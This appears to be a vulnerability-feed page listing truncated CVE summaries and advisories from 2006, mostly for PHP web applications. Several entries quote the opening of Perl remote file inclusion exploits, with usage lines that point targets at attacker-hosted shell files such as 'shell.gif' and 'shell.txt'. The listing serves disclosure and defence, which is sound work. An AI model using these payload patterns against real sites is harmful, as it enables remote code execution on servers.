Design/Logic Flaw

Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling...

CVE-2006-2547

Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling...

CVE-2006-2547

CVE-2006-2547 affects SAP with Informix, specifically the sapdba command. The vulnerability arises from insecure environment variable handling, enabling local users to run arbitrary commands via unknown vectors. Affected scope is SAP Informix deployments before version 700 and 700 up to patch 100...

XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion

The version of XOOPS installed on the remote host allows an unauthenticated attacker to skip processing of the application's 'include/common.php' script and thereby to gain control of the variables '$xoopsConfiglanguage' and '$xoopsConfigthemeset', which are used by various scripts to include PHP...

Code injection

Invision Power Board IPB before 2.1.6 allows remote attackers to execute arbitrary PHP script via attack vectors involving 1 the posticon variable in classes/post/classpost.php and 2 the df value in actionpublic/moderate.php...

Cross site scripting

Cross-site scripting XSS vulnerability in 1 index.php and 2 bmc/admin.php in BoastMachine bMachine 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly filtered when it is accessed using the $SERVER"PHPSELF" variable...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in ScozNews 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFIGmainpath parameter in 1 functions.php, 2 template.php, 3 news.php, 4 help.php, 5 mail.php, 6 Admin/admincats.php, 8 Admin/adminedit.php, 9...

CVE-2006-2487

Multiple PHP remote file inclusion vulnerabilities in ScozNews 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFIGmainpath parameter in 1 functions.php, 2 template.php, 3 news.php, 4 help.php, 5 mail.php, 6 Admin/admincats.php, 8 Admin/adminedit.php, 9...

FreeBSD : sudo -- arbitrary command execution (1b725079-9ef6-11da-b410-000e0c2e438a)

Tavis Ormandy reports : The bash shell uses the value of the PS4 environment variable after expansion as a prefix for commands run in execution trace mode. Execution trace mode xtrace is normally set via bash's -x command line option or interactively by running 'set -o xtrace'. However, it may al...

FreeBSD : squirrelmail -- _$POST variable handling allows for various attacks (7d52081f-2795-11da-bc01-000e0c2e438a)

A Squirrelmail Advisory reports : An extract$POST was done in optionsidentities.php which allowed for an attacker to set random variables in that file. This could lead to the reading and possible writing of other people's preferences, cross site scripting or writing files in webserver-writable...

Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit

Exploit for unknown platform in category web applications ============================================================== Dokeos LMS uso: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ T...

Dokeos LMS &lt;= 1.6.4 (authldap.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl Dokeos Learning Management System 1.6.4 Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: ? system$cm...

StatIt 4 - &#039;statitpath&#039; Remote File Inclusion

!/usr/bin/perl Statit V4 Remote File Inclusion exploit Bug discovered By IGNOR3 [email protected] http://www.smart-boys.com Google Search=inurl:statit.php usage: perl statit.pl perl statit.pl http://target.com/statit/ http://www.golha.net/ignor3/shell.txt cmd cmd shell example: cmd shell...

CVE-2006-2183

Untrusted search path vulnerability in Truecrypt 4.1, when running suid root on Linux, allows local users to execute arbitrary commands and gain privileges via a modified PATH environment variable that references a malicious mount command...

CVE-2006-2183

CVE-2006-2183 affects TrueCrypt 4.1 on Linux when running as a set-user-ID root process. The vulnerability arises from an untrusted search path: a modified PATH environment variable referencing a malicious mount command could allow local users to execute arbitrary commands and gain privileges. Th...

Auction 1.3m - &#039;phpbb_root_path&#039; Remote File Inclusion

!/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path =...

Remote file inclusion

Dynamic variable evaluation vulnerability in index.php in Stadtaus Guestbook Script 1.7 and earlier, when registerglobals is enabled, allows remote attackers to modify arbitrary program variables via parameters, which are evaluated as PHP variable variables, as demonstrated by performing PHP remo...

CVE-2006-2158

Dynamic variable evaluation vulnerability in index.php in Stadtaus Guestbook Script 1.7 and earlier, when registerglobals is enabled, allows remote attackers to modify arbitrary program variables via parameters, which are evaluated as PHP variable variables, as demonstrated by performing PHP remo...

Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications ================================================================= Advanced GuestBook if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; print "+ Advanced GuestBook for...

Design/Logic Flaw

DbbS 2.0-alpha and earlier allows remote attackers to obtain sensitive information via an invalid 1 fcategoryid parameter to topics.php or 2 unavariabile, 3 GLOBALS, or 4 SERVER parameters to script.php. NOTE: this information leak might be resultant from a global variable overwrite issue...